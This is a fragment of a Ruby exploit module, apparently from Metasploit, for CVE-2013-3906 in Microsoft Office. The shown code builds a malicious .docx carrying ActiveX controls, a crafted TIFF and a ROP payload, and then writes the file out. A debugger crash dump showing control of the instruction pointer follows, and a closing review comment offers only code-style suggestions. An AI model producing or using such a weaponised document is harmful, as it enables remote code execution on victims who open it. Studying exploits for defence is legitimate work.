{:fname => "/word/_rels/document.xml.rels", :data => make_doc_xml_reals(reals)}
end
#
# Loads a fiile
#
def read_file(fname)
buf = ''
::File.open(fname, "rb") do |f|
buf << f.read
end
buf
end
#
# Packages everything to docx
#
def make_docx(path)
print_status("Initializing files...")
last_rid = 0
last_rid, doc_xml_rels_items = init_doc_xml_rels_items(last_rid)
last_rid, activex = init_activex_files(last_rid)
last_rid, doc_props = init_doc_props(last_rid)
last_rid, tiff_file = init_tiff_file(last_rid)
doc_xml = init_doc_xml(last_rid, doc_xml_rels_items, activex, tiff_file)
ct_xml_file = init_contenttype_xml_file(activex, doc_xml_rels_items, doc_props, [doc_xml])
doc_xml_reals_file = init_doc_xml_reals_file(doc_xml_rels_items, activex, tiff_file)
rels_xml = init_rels(doc_xml, doc_props)
zip = Rex::Zip::Archive.new
Dir["#{path}/**/**"].each do |file|
p = file.sub(path+'/','')
if File.directory?(file)
print_status("Packing directory: #{p}")
zip.add_file(p)
else
# Avoid packing image1.jpeg because we'll load it separately
if file !~ /media\/image1\.jpeg/
print_status("Packing file: #{p}")
zip.add_file(p, read_file(file))
end
end
end
print_status("Packing ActiveX controls...")
activex.each do |ax|
ax_bin = ax[:bin]
ax_xml = ax[:xml]
ax_rels = ax[:rels]
vprint_status("Packing file: #{ax_bin[:fname]}")
zip.add_file(ax_bin[:fname], ax_bin[:bin])
vprint_status("Packing file: #{ax_xml[:fname]}")
zip.add_file(ax_xml[:fname], ax_xml[:xml])
vprint_status("Packing file: #{ax_rels[:fname]}")
zip.add_file(ax_rels[:fname], ax_rels[:rels])
end
print_status("Packing file: #{ct_xml_file[:fname]}")
zip.add_file(ct_xml_file[:fname], ct_xml_file[:data])
print_status("Packing file: #{tiff_file[:fname]}")
zip.add_file(tiff_file[:fname], tiff_file[:data])
print_status("Packing file: #{doc_xml[:fname]}")
zip.add_file(doc_xml[:fname], doc_xml[:xml])
print_status("Packing file: #{rels_xml[:fname]}")
zip.add_file(rels_xml[:fname], rels_xml[:data])
print_status("Packing file: #{doc_xml_reals_file[:fname]}")
zip.add_file(doc_xml_reals_file[:fname], doc_xml_reals_file[:data])
zip.pack
end
def exploit
@rop_payload = get_rop_payload
@schema = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
path = File.join(Msf::Config.data_directory, "exploits", "CVE-2013-3906")
docx = make_docx(path)
file_create(docx)
end
end
=begin
0:000> r
eax=414242f4 ebx=00000000 ecx=22a962a0 edx=44191398 esi=22c4d338 edi=1cfe5dc0
eip=44023a2a esp=0011fd8c ebp=0011fd98 iopl=0 nv up ei ng nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010286
OGL!GdipCreatePath+0x58:
44023a2a ff5050 call dword ptr [eax+50h] ds:0023:41424344=????????
0:000> k
ChildEBP RetAddr
WARNING: Stack unwind information not available. Following frames may be wrong.
0011fd98 437a9681 OGL!GdipCreatePath+0x58
0011fdc8 437b11b0 gfx+0x9681
0011fdf0 422b56e5 gfx+0x111b0
0011fe18 422a99f7 oart!Ordinal3584+0x86
0011fed8 422a9921 oart!Ordinal7649+0x2b2
0011fef0 422a8676 oart!Ordinal7649+0x1dc
001200bc 422a85a8 oart!Ordinal4145+0x199
001200fc 424898c6 oart!Ordinal4145+0xcb
001201bc 42489b56 oart!Ordinal3146+0xb15
001202cc 422a37df oart!Ordinal3146+0xda5
00120330 422a2a73 oart!Ordinal2862+0x14e
00120360 317821a9 oart!Ordinal2458+0x5e
001203bc 31782110 wwlib!GetAllocCounters+0x9bd51
001204a4 3177d1f2 wwlib!GetAllocCounters+0x9bcb8
001207ec 3177caef wwlib!GetAllocCounters+0x96d9a
0012088c 3177c7a0 wwlib!GetAllocCounters+0x96697
001209b0 3175ab83 wwlib!GetAllocCounters+0x96348
001209d4 317569e0 wwlib!GetAllocCounters+0x7472b
00120ad4 317540f5 wwlib!GetAllocCounters+0x70588
00120afc 3175400b wwlib!GetAllocCounters+0x6dc9d
To-do:
Turn the docx packaging into a mixin. Good luck with that.
=end
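Review bot: In `init_doc_xml`, `pre_defs.select { |e| chart_rids << e[:id] if e[:fname] =~ /\/word\/charts\// }` and `activex.select { |e| ax_rids << e[:id] }` call `select` purely for its side effect and throw the result away; the intent reads directly as `chart_rids = pre_defs.select { |e| e[:fname] =~ %r{/word/charts/} }.map { |e| e[:id] }` and `ax_rids = activex.map { |e| e[:id] }`, which also removes the two empty-array pre-declarations. Separately, the `custom_root` method added to `::Nokogiri::XML::Builder` at the top of the file is a process-wide monkey patch that every other module loaded in the same framework instance will see; a comment on that block saying so (and that a Refinement would scope it to this file) would save the next maintainer a surprise, since the existing comment only explains why the hack exists. `make_tiff` also re-implements the read that `read_file` already provides and could call `read_file(path)` instead.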